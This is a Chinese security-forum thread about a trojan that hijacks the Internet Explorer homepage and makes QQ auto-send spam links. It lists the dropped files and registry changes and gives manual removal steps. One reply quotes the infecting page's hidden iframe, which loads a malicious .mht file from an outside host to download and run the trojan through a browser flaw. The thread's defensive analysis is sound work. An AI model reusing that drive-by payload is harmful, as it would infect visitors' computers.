论坛: 病毒专区 标题: 关于“qq自动回复加上小尾巴!!”解决办法第一次修改版 复制本贴地址    
作者: CyberSpy [cyberspy]    论坛用户   登录
关于“qq自动回复加上小尾巴!!”

   近来众多网友反映qq回复时自动被加上了一些小尾巴,甚是烦人。究其原因:网页恶意代码。一些网站为了达到宣传自己、盗取qq等密码等等的可恶目的,太阴毒了!真心希望他们的无耻行为受到法律的制裁!(我没有做梦吧~)

   对于http://www.QQ168.net,由于我是ie6.0,所以没有能中招(本想以身试毒,看看个究竟的,但是天妒英才,哎 ~#¥#¥~),因此本文中的情况皆为根据以往经验虚拟出来的,也许会跟您的遭遇有很多出入,但是原理相通,希望能抛砖引玉,大家最后“高高兴兴上20cn来,快快乐乐杀毒去”。另幸好本版先前“马大哈”同志给出了一帖那个恶意网站的一部分vb脚本源代码对于ie恶意修改还是有所了解。

大概病毒行为:
(1)初始状况会在%windir%\system32\或者%\system\目录下生成一些乱七遭八的木马文件!从几个朋友寄给我的截图来看,没有发现共同的木马文件,只有这个项目绝对可疑:run里面intrenet,在c:\windows\system\intrenet.exe(注意这里故意伪造得像internet,不至于引起人们注意,这是坏蛋的常用手法哦).可能是exe、dll为文件后缀。应该是偷qq密码的,已经中招的,请一定注意自己的qq密码哦,最好马上修改得复杂点,不要再在本机上上qq了。
(2)修改注册表,增加开机启动项目,使木马服务器端一开机就运行
在注册表中添加HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\等以run开头的项目中,内容为:%windir%\system32\具体文件这里说不准!
    可能修改exe文件、txt文件和com文件等的默认打开方式(即文件关联,你一运行exe文件、txt文件或者com文件木马就被执行一次):将HKEY_CLASSES_ROOT\comfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\txtfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\exefile\shell\open\command的内容修改为%windir%\System32\具体文件这里说不准 %1 %*。
(3)恶意修改ie的一些选项,具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。


手工清除方法:
1、运行注册表编辑器(regedit)。
2、用系统自带的任务管理器或者进程管理软件停掉可疑的进程这里是c:\windows\system\intrenet.exe
3、修改HKEY_CLASSES_ROOT\comfile\shell\open\command和HKEY_CLASSES_ROOT\exefile\shell\open\command为"%1" %*,删掉HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等run开头的项,右边可疑项目。或者运行msconfig->启动->去掉可疑项目。 
4、删掉%windir%\system32\中上面发现的可疑文件,这里是c:\windows\system\intrenet.exe


  如果您是新手,对自己的行为不是很有信心,清除过程中可以利用一下:超级兔子魔法设置或者windows优化大师等系统工具。

另外:推荐使用http://www.20cn.org/download/Defend/navce8chs.rar 诺顿杀毒软件,可以在线升级病毒库。
请升级ie或者到微软下载补丁

  具体大概QQ情缘音乐世界,http://www.QQ168.net这个可恶的小尾巴中:这里是c:\windows\system\intrenet.exe应该是木马文件了;
c:\windows\system\systel.dll、c:\windows\system.dll (注意路径和文件名)这两个为恶意vbs脚本文件,不是系统动态链接库。他们修改通过恶意修改注册表达到系统启动便自行修改ie项目的目的,可以删除掉。具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。其他的,木马文件在哪里是什么我不清楚,十分十分抱歉!


PS:感谢几个朋友的发过来的截图,谢谢!

[此贴被 CyberSpy(cyberspy) 在 05月05日19时20分 编辑过]

地主 发表时间: 05/05 18:59

回复: CyberSpy [cyberspy]   论坛用户   登录
主要症状:
1.nt和2000下该木马会试图把自己注册为服务;
2.设置默认主页为 http://www.qq3344.com;
3.生成文件: intrenet.exe, windows.exe ;
4.试图在注册表里添加键值:hkey_current_user\software\microsoft\windows nt\currentversion\windows\load = %systemboot%\system\windows.exe
hkey_local_machine\software\microsoft\windows\currentversion\run\intrenet = %systemboot%\system\intrenet.exe,同时会定时对注册表进行修改,防止用户改正。
5.获取当前工作窗口,向发送消息的窗口填入:"朋友,你快去 http://www.qq3344.com 听超爽流行音乐摇滚dj免费电影!千万不要错过!我天天都上这个网!";并发送出去,骗取其他网友点击,实现快速传播
6.如果访问 http://www.qq3344.com, 首页文件中有如下代码:<iframe height=0 src="mhtml: http://www.qq3344.com/qq3344/qq3344.mht" width=0></iframe>;它会让计算机自动下载并打开qq3344.mht文件, 这个文件利用了iframe漏洞,会自动运行其中的附件, 这个附件就是本文介绍的这个病毒。

解决:非法篡改IE默认主页,和在QQ里无故发给别人一条<朋友,你快去http://www.QQ3344.com 听超爽流行音乐摇滚DJ免费电影!千万不要错过!我天天都上这个网!>或是诸如此类字样的文章,点击链接后,进入此网站,结果在电光石火之间,你会看到你的IE自动下载了什么东西,然后你的烦恼就开始了,每次打开IE窗口,就会进入这个无耻加败类加三级加死人妖的下九流网站,和朋友开QQ聊天时,也不时会自动给你加上网站地址发过去,极其讨厌!

首先,请大家和我一起骂:www.qq3344.net,或是www.qq168.net,?..个儿子没P眼。。 
第二步,下载超级魔法兔子
第三步:请打开IE,在工具――Internet选项――常规里,把默认主页改为空白页。这一步很重要!不然你完全修复之后再打开IE,结果。。哼哼,后果自负。 
第四步,在开始。。查找。。里查找以下文件:qq3344.exe 
start.exe 
windows.vbs 
windows.exe 
intrenet.exe如果没有这个就找intreneter.exe 
找到就删之,也许有一两个文件说系统正在使用,无法删除,那就用要用到魔法兔子了。。 
第五步,打开魔法兔子。。进。。。超级兔子软件优化,这时也许会出现让你注册的信息,取消即可,就进入魔法设置的界面,。。再点自动运行。。在自动运行里会有一个叫interneter的东西,选中,把前面的勾去掉,然后删除,再点进程管理,找一找,有一个qq3344的东西,选中,终止进程,然后再在开始。。查找里再找一找qq3344.exe,(或是qq168.exe)和interneter.exe,如果找到,删之。。。。 
重启电脑.

B1层 发表时间: 05/09 12:24

回复: ma2751_cn [ma2751_cn]      登录
����~~~请大家帮忙发点类似的URL来,我道想得到它的源代码来研究~~~

B2层 发表时间: 05/09 19:15

回复: magician50 [magician50]   论坛用户   登录
太慢了,已经重装了:(
那时只删了intrenet.exe文件,不过删了后第二次又会自动生成!

不知道这个新方法有没有用!

B3层 发表时间: 05/15 21:21

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号